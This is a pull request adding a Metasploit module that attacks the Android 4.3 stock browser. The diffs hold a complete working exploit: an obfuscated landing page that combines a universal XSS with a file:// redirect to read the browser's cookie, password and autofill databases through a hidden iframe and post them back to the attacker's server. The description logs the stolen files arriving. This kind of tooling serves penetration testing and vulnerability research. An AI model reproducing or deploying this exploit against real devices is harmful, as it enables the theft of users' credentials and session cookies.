### PR TITLE
Add android 4.3 stock browser cookie/password theft.

### DIFF
--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@@ -142,7 +142,8 @@ class Metasploit3 < Msf::Auxiliary
                     var c = d.toString(16);
                     return (c.length < 2) ? 0+c : c;
                   }).join(new String);
-                  if (hex.length && hex.substring(0,8)==='53514c69') {
+                  /*ensures there are no 'not allowed' responses that appear to be valid data*/
+                  if (hex.length && hex.indexOf('3c68746d6c3e3c626f64793e6e6f7420616c6c6f7765643c2f626f64793e3c2f68746d6c3e') == '-1') {
                     top.postMessage({data:hex,url:location.href}, '*');
                   }
                   parent.postMessage(1,'*');

--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@@ -1,0 +1,137 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/jsobfu'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::JSObfu
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Android Browser File Theft',
+      'Description' => %q{
+        This module steals the cookie, password, and autofill databases from the
+        Browser application on AOSP 4.3 and below.
+      },
+      'Author'         => [
+        'Rafay Baloch', # Found UXSS bug in Android Browser
+        'joev'          # File redirect and msf module
+      ],
+      'License'     => MSF_LICENSE,
+      'Actions'     => [[ 'WebServer' ]],
+      'PassiveActions' => [ 'WebServer' ],
+      'References' =>
+        [
+          ['URL', 'https://code.google.com/p/chromium/issues/detail?id=90222'] # the UXSS
+        ],
+      'DefaultAction'  => 'WebServer'
+    ))
+
+     register_options([
+      OptString.new('ADDITIONAL_FILES', [
+        false,
+        'Comma-separated list of addition file URLs to steal.',
+      ]),
+      OptBool.new('DEFAULT_FILES', [
+        true,
+        'Steals a default set of file URLs',
+        true
+      ])
+    ], self.class)
+  end
+
+  def run
+    exploit
+  end
+
+  def on_request_uri(cli, request)
+    if request.method.downcase == 'post'
+      process_post(cli, request)
+      send_response_html(cli, '')
+    else
+      print_status("Sending exploit landing page...")
+      send_response_html(cli, exploit_html)
+    end
+  end
+
+  def process_post(cli, request)
+    data = JSON.parse(request.body)
+    file = File.basename(data['url'])
+    print_good "File received: #{request.body.length.to_f/1024}kb #{file}"
+    loot_path = store_loot(
+      file,
+      'application/x-sqlite3',
+      cli.peerhost,
+      data,
+      File.basename(data['url']),
+      "#{cli.peerhost.ljust(16)} Android browser file"
+    )
+    print_good "Saved to: #{loot_path}"
+  end
+
+
+  def file_urls
+    default_urls = [
+      'file:///data/data/com.android.browser/databases/webviewCookiesChromium.db',
+      'file:///data/data/com.android.browser/databases/webview.db',
+      'file:///data/data/com.android.browser/databases/autofill.db',
+      'file:///data/data/com.android.browser/databases/browser2.db',
+      'file:///data/data/com.android.browser/app_appcache/ApplicationCache.db',
+      'file:///data/data/com.android.browser/app_databases/Databases.db',
+      'file:///data/data/com.android.browser/databases/webviewCookiesChromiumPrivate.db'
+    ]
+
+    unless datastore['DEFAULT_FILES']
+      default_urls = []
+    end
+
+    default_urls + (datastore['ADDITIONAL_FILES']||'').split(',')
+  end
+
+  def exploit_html
+    %Q|
+      <!doctype html>
+      <html>
+      <body>
+      <script>#{exploit_js}</script>
+      </body>
+      </html>
+    |
+  end
+
+  def exploit_js
+    js_obfuscate %Q|
+
+      window.onmessage = function(e) {
+        var x = new XMLHttpRequest;
+        x.open("POST", location.href);
+        x.send(JSON.stringify(e.data))
+      };
+
+      var brokenFrame = document.createElement('iframe');
+      brokenFrame.src = 'http://localhost:100';
+      brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
+      brokenFrame.onload = function() {
+        brokenFrame.onload = null;
+        document.documentURI = 'javascript://hostname.com/%0D%0Aurls=(#{JSON.generate(file_urls)});'+
+          'var t=function(){setTimeout(function(){next(urls.shift());},1)};window.onmessage=t;'+
+          'var next=(function(url){if(!url)return;try{var f = document.createElement("iframe");f.src=url;f.onload=f'+
+          'unction(){f.onload=null;document.documentURI="javascript://hostname.com/%250D%250Ax=new '+
+          'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.send();x.onload=fun'+
+          'ction(){ top.postMessage({data:x.responseText,url:location.href}, String.fromCharCode(42));'+
+          'parent.postMessage(1,String.fromCharCode(42));};x.onerror=function(){parent.postMessage(1,S'+
+          'tring.fromCharCode(42))};";f.contentWindow.location = "";};document.body.appendChild(f);}catch(e){t();}});t();';
+        brokenFrame.contentWindow.location = "";
+      };
+
+      document.body.appendChild(brokenFrame);
+    |
+  end
+
+end

--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
                     return (c.length < 2) ? 0+c : c;
                   }).join(new String);
                   /*ensures there are no 'not allowed' responses that appear to be valid data*/
-                  if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>","")}') == '-1') {
+                  if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>","")}') === -1) {
                     top.postMessage({data:hex,url:location.href}, '*');
                   }
                   parent.postMessage(1,'*');

--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary
 
       var brokenFrame = document.createElement('iframe');
       brokenFrame.src = 'http://localhost:100';
-      //brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
+      brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
       brokenFrame.onload = function() {
         brokenFrame.onload = null;
         document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(xss.toString())+')()';

--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
                     return (c.length < 2) ? 0+c : c;
                   }).join(new String);
                   /*ensures there are no 'not allowed' responses that appear to be valid data*/
-                  if (hex.length && hex.indexOf('3c68746d6c3e3c626f64793e6e6f7420616c6c6f7765643c2f626f64793e3c2f68746d6c3e') == '-1') {
+                  if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>","")}') == '-1') {
                     top.postMessage({data:hex,url:location.href}, '*');
                   }
                   parent.postMessage(1,'*');

--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@@ -28,6 +28,8 @@ class Metasploit3 < Msf::Auxiliary
       'PassiveActions' => [ 'WebServer' ],
       'References' =>
         [
+          # patch for file redirection, 2014
+          ['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
           ['URL', 'https://code.google.com/p/chromium/issues/detail?id=90222'] # the UXSS
         ],
       'DefaultAction'  => 'WebServer'


### PR DESCRIPTION
Steals the cookie, password, and autofill sqlite databases from the Android 4.3 stock browser. This includes HttpOnly/Secure cookies.

The module uses a different UXSS that Rafay found but never made a module for. It then abuses a weakness  where error pages can load file:// resources.
#### Verification
- [x]  Run the module
- [x] Browse to it in a 4.3-or-lower device with the vanilla Browser app (the exploit should work on 3rd party WebView browsers but you will have to shell into the device and find some interesting URLs in the browser sandbox to steal using the `ADDITIONAL_FILES` option).
- [x] Files are stolen
  
  ```
  [+] 192.168.0.3      android_browser_file_theft - File received: 36.556640625kb webviewCookiesChromium.db
  [+] 192.168.0.3      android_browser_file_theft - File received: 236.0947265625kb webview.db
  [+] 192.168.0.3      android_browser_file_theft - File received: 94.4990234375kb autofill.db
  [+] 192.168.0.3      android_browser_file_theft - File received: 2023.66796875kb browser2.db
  [+] 192.168.0.3      android_browser_file_theft - File received: 0.08203125kb Databases.db
  [+] 192.168.0.3      android_browser_file_theft - File received: 93.935546875kb ApplicationCache.db
  ```
